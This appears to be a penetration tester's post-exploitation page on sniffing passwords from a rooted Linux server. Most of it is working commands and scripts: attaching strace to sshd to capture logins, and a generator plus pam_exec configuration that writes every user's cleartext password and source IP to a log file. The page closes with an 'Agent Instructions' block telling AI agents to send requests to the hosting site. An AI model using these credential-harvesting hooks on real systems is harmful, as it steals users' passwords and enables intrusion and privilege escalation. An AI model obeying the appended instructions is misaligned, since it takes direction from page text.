# Sniffing Passwords ## Strace With root access on a server we can attach to the SSH service and sniff usernames and passwords in plaintext if a user authenticates. This can be powerful when looking for new accounts to pivot with and/or higher privileged accounts. ```bash [root@victimHost ~]# w 15:05:18 up 26 days, 6:25, 2 users, load average: 0.00, 0.05, 0.16 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT unixadm pts/0 someHost 15:04 6.00s 0.03s 0.00s sshd: unixadm [priv] [root@victimHost ~]# ps aux | grep ssh root 1366 0.0 0.0 113000 4368 ? Ss Jun02 0:00 /usr/sbin/sshd -D unixadm 28721 0.0 0.0 176412 2644 ? S 10:04 0:00 sshd: unixadm@pts/0 [root@victimHost ~]# kill 28721 [root@victimHost ~]# strace -f -p 1366 -e trace=write -o data.log strace: Process 1366 attached ``` *** ## PAM With root access on a server we can create a simple bash script to log all authorization requests handled by `pam.d`. The log data will show a timestamp, username, password and source IP all in cleartext. This is of course very useful when trying to pivot and/or escalate privileges. ### Encrypted logs The below helper script will create a new, `pam_log.sh`, script to be uploaded on a target host. ```bash #!/bin/bash KEY_DIR="./ssh_key_pair" PRIVATE_KEY_PATH="${KEY_DIR}/pam-id_rsa" PUBLIC_KEY_PATH="${KEY_DIR}/pam-id_rsa.pub" PEM_KEY_PATH="${KEY_DIR}/pam-id_rsa.pem" LOG_SCRIPT_PATH="./pam_log.sh" mkdir -p "$KEY_DIR" echo "[+] Generating SSH key pair..." ssh-keygen -t rsa -b 4096 -m PEM -f "$PRIVATE_KEY_PATH" -N "" >/dev/null echo "[+] Extracting public key in PEM format..." ssh-keygen -e -f "$PUBLIC_KEY_PATH" -m PEM > "${PEM_KEY_PATH}" SSH_PUBLIC_KEY=$(cat "${PEM_KEY_PATH}" | sed ':a;N;$!ba;s/\n/\\n/g') echo "[+] Creating the log script..." cat < "$LOG_SCRIPT_PATH" #!/bin/bash SSH_PUBLIC_KEY="$SSH_PUBLIC_KEY" LOG_ENTRY=" \$(date) \${PAM_USER}, \$(cat -), From: \${PAM_RHOST}" echo "\$LOG_ENTRY" | openssl pkeyutl -encrypt -inkey <(echo -e "\$SSH_PUBLIC_KEY" | sed 's/\\n/\n/g') -pubin | base64 >> /var/log/creds.log EOF chmod +x "$LOG_SCRIPT_PATH" echo "[+] Generated log script: $LOG_SCRIPT_PATH" echo -e "\n[i] Decrypt log: cat /var/log/creds.log | base64 -d | openssl pkeyutl -decypt -inkey $PRIVATE_KEY_PATH" ``` ```bash kdev :: ~/log » ./create_pam_log.sh [+] Generating SSH key pair... [+] Extracting public key in PEM format... [+] Creating the log script... [+] Generated log script: ./pam_log.sh [i] Decrypt log: cat /var/log/creds.log | base64 -d | openssl pkeyutl -decypt -inkey ./ssh_key_pair/pam-id_rsa ``` Upload `pam_log.sh` to the target and modify `/etc/pam.d/common-auth` to execute the script on authentication requests. ```bash kdev :: ~ » echo "auth optional pam_exec.so quiet expose_authtok /home/void/log/pam_log.sh" | sudo tee -a /etc/pam.d/common-auth ``` Wait for a user to login and reap the rewards. Other users are unable to to read the content without having the private key. ```bash kdev :: ~/log » cat /var/log/creds.log WNGIdThHgz[...]Hww2aa0= kdev :: ~/log » cat /var/log/creds.log | base64 -d | openssl pkeyutl -decrypt -inkey ./ssh_key_pair/pam-id_rsa Fri Mar 14 11:18:14 CET 2025 void, Passw0rd!, From: ::1 ``` ### Unencrypted logs If you don't care about the security aspects, or if the target doesn't have `openssl` or `base64` installed, you can instead use this simple unencrypted version to log authentication requests. ```bash ## Create the simple script to log logins $ chmod 700 /usr/local/bin/capture.sh $ cat /usr/local/bin/capture.sh #!/bin/sh echo " $(date) $PAM_USER, $(cat -), From: $PAM_RHOST" >> /var/log/creds.log ## Create log file and set high permissions so no unauthorized user reads it $ touch /var/log/creds.log $ chmod 600 /var/log/creds.log ## Edit /etc/pam.d/common-auth and add the following line $ cat /etc/pam.d/common-auth ... auth optional pam_exec.so quiet expose_authtok /usr/local/bin/capture.sh ## All services using PAM will now be logged to /var/log/creds.log in clear text ➜ ~ cat /var/log/creds.log Wed Nov 22 12:56:54 CET 2023 void, Passw0rd!, From: ::1 ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xpthree.gitbook.io/notes/post-exploit/sniffing-passwords.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.